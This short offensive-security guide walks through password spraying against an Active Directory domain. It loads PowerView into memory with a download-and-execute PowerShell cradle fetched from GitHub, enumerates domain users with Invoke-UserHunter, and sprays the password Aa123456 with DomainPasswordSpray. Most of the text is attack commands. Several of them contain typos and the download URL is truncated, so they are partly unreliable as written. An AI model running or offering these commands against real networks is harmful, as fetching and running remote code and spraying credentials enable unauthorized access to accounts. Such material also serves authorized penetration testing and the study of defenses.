

## **Password Spraying + PowerView**

First invoke the PowerView Module of UserHunt in order to enumerate the users of the environment' and Out-File the result to txt.file before starting the password spraying

1. Load the Powerview to the memory with the following command :

Invoke-Expression (New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowershellMafia/PowerSple

2. Execute UserHunter | Select-Object -ExpandProperty UserName | Out-File users.txt in order to extract from the output the usernames

Invoke-UserHunter | Select-Object -ExpandProperty UserName | Out-Fille users.txt

Expect for a file that contains usernames.

Use DomainPasswordSpray-Master Script

DomainPasswordSpray.ps1.

Import-Module .\DomainPassowrdSpray.ps1

Invoke-DomainPasswordSpray -UserList .\users.txt -Domain [Domain.Name] -Password Aa123456 - OutFile sprayed.txt

These commands invoking the script and using User list function that points to the file that was generated by PowerView tool and the domain, with -Password state for a potential password and output towards a file for furthermore usage.